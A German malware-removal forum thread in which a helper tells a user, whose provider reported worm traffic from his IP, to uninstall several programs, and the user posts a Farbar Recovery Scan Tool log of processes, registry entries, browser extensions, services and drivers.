Zurück   Trojaner-Board > Malware entfernen > Log-Analyse und Auswertung

Log-Analyse und Auswertung: UPC meldet: Virus, würmer werden über meine IP versendet

Windows 7 Wenn Du Dir einen Trojaner eingefangen hast oder ständig Viren Warnungen bekommst, kannst Du hier die Logs unserer Diagnose Tools zwecks Auswertung durch unsere Experten posten. Um Viren und Trojaner entfernen zu können, muss das infizierte System zuerst untersucht werden: Erste Schritte zur Hilfe. Beachte dass ein infiziertes System nicht vertrauenswürdig ist und bis zur vollständigen Entfernung der Malware nicht verwendet werden sollte.XML

Antwort
Alt 04.08.2017, 18:23   #16
Lost_Viking
 
UPC meldet: Virus, würmer werden über meine IP versendet - Standard

UPC meldet: Virus, würmer werden über meine IP versendet



*up*

Alt 04.08.2017, 22:17   #17
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
UPC meldet: Virus, würmer werden über meine IP versendet - Standard

UPC meldet: Virus, würmer werden über meine IP versendet



Da muss aber einiges an Schrott runter. Tw. alte Versionen, ein andere Teil seghr viel unbrauchbarer Schrott, u.a. auch Avira. Hau das alles weg. Alternativen werden genannt wenn wir hier durch sind.


Gib Bescheid wenn Avira weg ist; wenn wir hier durch sind, kannst du auf einen anderen Virenscanner umsteigen, Infos folgen dann im Abschlussposting. Bitte JETZT nix mehr ohne Absprache installieren!


Lade Dir bitte von hier Revo Uninstaller Download Revo Uninstaller (alternativ portable Revo Uninstaller) herunter.
  • Installiere und starte das Programm. (Bebilderte Anleitung zu Revo Uninstaller)
  • Klicke auf Optionen und wähle als Sprache Deutsch.
  • Suche im Uninstallerfeld nach den Programmen:


    7-Zip 9.20 (x64 edition)

    Adobe Acrobat Reader DC - Deutsch

    Advanced SystemCare 10

    Avira Antivirus

    Avira Connect

    Avira Phantom VPN

    Avira Software Updater

    Avira System Speedup

    Driver Booster 4.4


  • Wähle die Programme nacheinander aus und klicke jedes Mal auf Uninstall.
  • Wähle anschließend den Modus "Moderat" aus.
  • Reste löschen:
    Klicke auf dann auf und dann auf .

 

__________________

__________________

Alt 06.08.2017, 00:27   #18
Lost_Viking
 
UPC meldet: Virus, würmer werden über meine IP versendet - Standard

UPC meldet: Virus, würmer werden über meine IP versendet



Alles klar. habe die genannten Programme deinstalliert.

Mit dem Deinstaller ist mir aufgefallen dass ich noch viele andere unnötige bzw nicht mehr verwendetet Programme drauf hatte. Also diese grad auch deinstalliert.

Hier die neuen Logs falls gebraucht. Sollten jetzt auch übersichtlicher sein nach dem aufräumen.

Code:
ATTFilter
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 31-07-2017
durchgeführt von **** (Administrator) auf SILENTDRAGON (06-08-2017 01:14:07)
Gestartet von C:\Users\****\Desktop
Geladene Profile: **** (Verfügbare Profile: ****)
Platform: Windows 7 Ultimate (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: Chrome)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(Microsoft Corporation) C:\Program Files\Microsoft LifeCam\MSCamS64.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Electronic Arts) G:\Program Files (x86)\Origin\OriginWebHelperService.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Microsoft Corporation) C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\SkypeHost.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.5\GoogleCrashHandler64.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Logitech, Inc.) C:\Program Files\Logitech\SetPointP\SetPoint.exe
(Logitech, Inc.) C:\Program Files\Common Files\logishrd\KHAL3\KHALMNPR.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\LCore.exe
(TomTom) C:\Program Files (x86)\MyDrive Connect\TomTom MyDrive Connect.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Valve Corporation) G:\Program Files (x86)\Steam\Steam.exe
(Dropbox, Inc.) C:\Users\****\AppData\Local\Dropbox\Update\DropboxUpdate.exe
(Wargaming.net) G:\Games\World_of_Warships\WargamingGameUpdater.exe
(Akamai Technologies, Inc.) C:\Users\****\AppData\Local\Akamai\netsession_win.exe
(Akamai Technologies, Inc.) C:\Users\****\AppData\Local\Akamai\netsession_win.exe
(Google, Inc) C:\Users\****\AppData\Local\Programs\Google\Google Photos Backup\Google Photos Backup.exe
(Spotify Ltd) C:\Users\****\AppData\Roaming\Spotify\SpotifyWebHelper.exe
() C:\Program Files\Qualcomm Atheros\Network Manager\NetworkManager.exe
(Logitech Inc.) C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe
() C:\Program Files (x86)\Logitech\LWS\Webcam Software\CameraHelperShell.exe
(Samsung Electronics Co., Ltd.) C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Valve Corporation) G:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
(Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(NVIDIA Corporation) C:\Users\****\AppData\Local\NVIDIA\NvBackend\ApplicationOntology\NvOAWrapperCache.exe
(Qualcomm Atheros) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(Geek Software GmbH) C:\Program Files (x86)\PDF24\pdf24.exe
(Qualcomm Atheros) C:\Program Files\Qualcomm Atheros\Network Manager\KillerService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(Skype Technologies) C:\Program Files (x86)\Skype\Updater\Updater.exe
(IObit) C:\Program Files (x86)\IObit\Classic Start\SMService.exe
(IObit) C:\Program Files (x86)\IObit\Classic Start\ClassicStart.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(IObit) C:\Program Files (x86)\IObit\Classic Start\StartMenu_Hook.exe
(IObit) C:\Program Files (x86)\IObit\Classic Start\InstallServices.exe
(DEVGURU Co., LTD.) C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe

==================== Registry (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [9197568 2017-05-15] (Realtek Semiconductor)
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2014-05-28] (Intel Corporation)
HKLM\...\Run: [EvtMgr6] => C:\Program Files\Logitech\SetPointP\SetPoint.exe [3113592 2015-08-26] (Logitech, Inc.)
HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [17406072 2017-01-24] (Logitech Inc.)
HKLM-x32\...\Run: [LWS] => C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe [204136 2012-09-13] (Logitech Inc.)
HKLM-x32\...\Run: [KiesTrayAgent] => C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe [318128 2016-11-16] (Samsung Electronics Co., Ltd.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2017-07-21] (Oracle Corporation)
HKLM-x32\...\Winlogon: [Userinit] 
Winlogon\Notify\LBTWlgn: c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll (Logitech, Inc.)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9818328 2017-06-30] (Piriform Ltd)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [MyDriveConnect.exe] => C:\Program Files (x86)\MyDrive Connect\TomTom MyDrive Connect.exe [1918696 2017-05-08] (TomTom)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Steam] => G:\Program Files (x86)\Steam\steam.exe [3062560 2017-07-18] (Valve Corporation)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Google Update] => C:\Users\****\AppData\Local\Google\Update\1.3.33.5\GoogleUpdateCore.exe [601168 2017-04-27] (Google Inc.)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [BingSvc] => C:\Users\****\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2015-11-05] (© 2015 Microsoft Corporation)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Dropbox Update] => C:\Users\****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-05] (Dropbox, Inc.)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [World of Warships] => G:\Games\World_of_Warships\WargamingGameUpdater.exe [3136264 2017-06-02] (Wargaming.net)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Akamai NetSession Interface] => C:\Users\****\AppData\Local\Akamai\netsession_win.exe [4490200 2017-01-03] (Akamai Technologies, Inc.)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Google Photos Backup] => C:\Users\****\AppData\Local\Programs\Google\Google Photos Backup\Google Photos Backup.exe [3790936 2016-04-09] (Google, Inc)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Spotify Web Helper] => C:\Users\****\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1446000 2017-04-19] (Spotify Ltd)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Killer Network Manager.lnk [2015-02-03]
ShortcutTarget: Killer Network Manager.lnk -> C:\Windows\Installer\{A32F7F52-0DC5-40EF-84BD-7D30CC20D157}\NetworkManager.exe_130C27D738F34C89BDDF21BCFD74B56D.exe (Flexera Software LLC)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\simplicheck.lnk [2017-05-06]
ShortcutTarget: simplicheck.lnk -> C:\Program Files (x86)\simplitec\simplicheck\simplicheck.exe (Keine Datei)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\UE Music Library-Taskleisten-Tool.lnk [2016-05-04]
ShortcutTarget: UE Music Library-Taskleisten-Tool.lnk -> C:\Program Files (x86)\Logitech\UE Music Library\UEMLTray.exe (Keine Datei)
Startup: C:\Users\****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk [2017-08-05]
ShortcutTarget: Dropbox.lnk -> C:\Users\****\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 62.2.24.162 62.2.17.61 62.2.24.158 62.2.17.60
Tcpip\..\Interfaces\{f81baef3-2886-44c5-9a55-1cfe2ed39eeb}: [DhcpNameServer] 62.2.24.162 62.2.17.61 62.2.24.158 62.2.17.60
ManualProxies: 

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <==== ACHTUNG
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avira.net/#web/result?source=art&q=
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = 
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.ch/
SearchScopes: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: Kein Name -> {AF949550-9094-4807-95EC-D1C317803333} -> Keine Datei
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\ssv.dll [2017-08-06] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\jp2ssv.dll [2017-08-06] (Oracle Corporation)

FireFox:
========
FF ProfilePath: C:\Users\****\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default [2017-08-06]
FF Extension: (Avira Browser Safety) - C:\Users\****\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default\Extensions\abs@avira.com [2017-08-01]
FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt
FF Extension: (Logitech SetPoint) - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt [2016-08-08] [ist nicht signiert]
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.56 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2014-09-03] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2014-09-03] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.144.2 -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\dtplugin\npDeployJava1.dll [2017-08-06] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.144.2 -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\plugin2\npjp2.dll [2017-08-06] (Oracle Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2017-07-19] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2017-07-19] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-08-01] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-08-01] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.0 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei]
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei]
FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: @tools.google.com/Google Update;version=3 -> C:\Users\****\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-27] (Google Inc.)
FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: @tools.google.com/Google Update;version=9 -> C:\Users\****\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-27] (Google Inc.)
FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: SkypePlugin -> C:\Users\****\AppData\Local\SkypePlugin\7.29.0.73\npGatewayNpapi.dll [2016-12-08] (Skype Technologies S.A.)
FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: SkypePlugin64 -> C:\Users\****\AppData\Local\SkypePlugin\7.29.0.73\npGatewayNpapi-x64.dll [2016-12-08] (Skype Technologies S.A.)

Chrome: 
=======
CHR HomePage: Default -> msn.com
CHR StartupUrls: Default -> "hxxps://www.google.ch/"
CHR DefaultSearchURL: Default -> hxxp://www.bing.com/search?FORM=__PARAM__DF&PC=__PARAM__&q={searchTerms}
CHR DefaultSearchKeyword: Default -> bing.com
CHR DefaultSuggestURL: Default -> hxxp://www.bing.com/osjson.aspx?FORM=__PARAM__DF&PC=__PARAM__&query={searchTerms}
CHR Profile: C:\Users\****\AppData\Local\Google\Chrome\User Data\Default [2017-08-06]
CHR Extension: (Google*Übersetzer) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb [2017-08-01]
CHR Extension: (Google Präsentationen) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-08-01]
CHR Extension: (Google Docs) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-08-01]
CHR Extension: (Google Drive) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-08-01]
CHR Extension: (YouTube) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-08-01]
CHR Extension: (Bing) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\fcfenmboojpjinhpgggodefccipikbpd [2017-08-01]
CHR Extension: (Google Tabellen) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-08-01]
CHR Extension: (Google Docs Offline) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-08-01]
CHR Extension: (Testen Sie Ihre Internet-Geschwindigkeit) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\hekhmbhledgahgpondpnaeaffoipehch [2017-08-01]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-01]
CHR Extension: (Deutsch Übersetzer) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\ohiojbnhbaoegegaajagfiekffejejih [2017-08-01]
CHR Extension: (YouTube™ Flash-HTML5) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\omimccinlhlkpjaeaocglgmkbelejlhj [2017-08-01]
CHR Extension: (Google Mail) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-08-01]
CHR Extension: (Chrome Media Router) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-08-01]
CHR Extension: (Skype-Anrufe) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\poghlonenmjdkfghdpfomojhhfggildk [2017-08-01]
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fcfenmboojpjinhpgggodefccipikbpd] - hxxps://clients2.google.com/service/update2/crx

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [305664 2014-08-11] (Qualcomm Atheros) [Datei ist nicht signiert]
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [1465352 2017-01-15] ()
S3 GalaxyClientService; C:\Program Files (x86)\GalaxyClient\GalaxyClientService.exe [487488 2017-07-31] (GOG.com)
S3 GalaxyCommunication; C:\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe [8163392 2017-07-15] (GOG.com)
S3 HiPatchService; G:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe [9728 2017-07-12] (Hi-Rez Studios) [Datei ist nicht signiert]
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [16232 2014-05-28] (Intel Corporation)
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [887256 2014-05-13] (Intel(R) Corporation)
R2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [131544 2014-09-03] (Intel Corporation)
S3 iumsvc; C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe [178312 2015-09-26] (Intel Corporation)
S3 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [154584 2014-09-03] (Intel Corporation)
R2 LogiRegistryService; C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe [225400 2017-04-06] (Logitech Inc.)
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [512960 2017-07-26] (NVIDIA Corporation)
R3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [512960 2017-07-26] (NVIDIA Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [462968 2017-07-19] (NVIDIA Corporation)
R2 NvTelemetryContainer; C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [449984 2017-07-26] (NVIDIA Corporation)
S3 Origin Client Service; G:\Program Files (x86)\Origin\OriginClientService.exe [2169696 2017-07-11] (Electronic Arts)
R2 Origin Web Helper Service; G:\Program Files (x86)\Origin\OriginWebHelperService.exe [3149672 2017-07-11] (Electronic Arts)
S4 PDF Architect 5 Manager; C:\ProgramData\pdfforge\PDF Architect 5 Manager\PDF Architect 5\Architect Manager.exe [985904 2017-02-01] (© pdfforge GmbH.)
R2 PDF24; C:\Program Files (x86)\PDF24\pdf24.exe [217736 2017-02-23] (Geek Software GmbH)
R2 Qualcomm Atheros Killer Service V2; C:\Program Files\Qualcomm Atheros\Network Manager\KillerService.exe [387584 2014-09-19] (Qualcomm Atheros) [Datei ist nicht signiert]
R2 SMService; C:\Program Files (x86)\IObit\Classic Start\SMService.exe [1066272 2016-11-15] (IObit)
R2 ss_conn_service; C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-07-22] (DEVGURU Co., LTD.)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-06-20] (Microsoft Corporation)
S2 DigitalWave.Update.Service; "C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\app_updater.exe" [X]

===================== Treiber (Nicht auf der Ausnahmeliste) ======================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R3 AVerPL33_x64; C:\WINDOWS\system32\DRIVERS\AVerPL33_x64.sys [1780992 2014-07-16] (AVerMedia TECHNOLOGIES, Inc.)
S3 bcmsmbsp; C:\WINDOWS\System32\drivers\bcmsmbsp.sys [41176 2015-08-22] (Broadcom Corporation.)
S1 BfLwf; C:\WINDOWS\system32\DRIVERS\bwcW8x64.sys [97968 2014-09-11] (Qualcomm Atheros, Inc.)
S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [130688 2016-07-22] (Samsung Electronics Co., Ltd.)
R3 ETDSMBus; C:\WINDOWS\System32\drivers\ETDSMBus.sys [32840 2017-07-16] (ELAN Microelectronic Corp.)
R1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [26528 2015-03-15] (REALiX(tm))
S3 Ke2200; C:\WINDOWS\System32\drivers\e22w8x64.sys [130224 2014-03-27] (Qualcomm Atheros, Inc.)
R3 KillerEth; C:\WINDOWS\System32\drivers\e2xw10x64.sys [145920 2017-03-18] (Qualcomm Atheros, Inc.)
R2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-21] (Logitech)
R3 LGJoyXlCore; C:\WINDOWS\system32\drivers\LGJoyXlCore.sys [67736 2017-01-24] (Logitech Inc.)
R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_24ddebfb518b5a55\nvlddmkm.sys [15668664 2017-07-19] (NVIDIA Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [30144 2017-07-26] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [48064 2017-07-26] (NVIDIA Corporation)
R3 nvvhci; C:\WINDOWS\System32\drivers\nvvhci.sys [57792 2017-07-19] (NVIDIA Corporation)
R3 SaiMini; C:\WINDOWS\System32\drivers\SaiMini.sys [23968 2016-08-06] (Saitek)
R3 SaiNtBus; C:\WINDOWS\system32\drivers\SaiBus.sys [51488 2016-08-06] (Saitek)
S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] ()
S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [164992 2016-07-22] (Samsung Electronics Co., Ltd.)
S3 USBADVAU; C:\WINDOWS\system32\drivers\cm11264.sys [4135936 2013-11-01] (C-Media Electronics Inc) [Datei ist nicht signiert]
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-08-06 01:08 - 2017-08-06 01:08 - 001160480 _____ (Uniblue Systems Limited ) C:\Users\****\Downloads\pcmechanicpm.exe
2017-08-06 00:28 - 2017-08-06 00:28 - 000097856 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2017-08-05 23:13 - 2017-08-05 23:13 - 000003064 _____ C:\WINDOWS\System32\Tasks\Driver Booster SkipUAC (****)
2017-08-05 22:57 - 2017-08-05 22:57 - 000000927 _____ C:\Users\Public\Desktop\Revo Uninstaller.lnk
2017-08-05 22:57 - 2017-08-05 22:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2017-08-05 00:32 - 2017-08-05 00:32 - 000000000 ____D C:\Users\****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2017-08-04 22:53 - 2017-08-05 02:38 - 000000000 ____D C:\Users\****\.junique
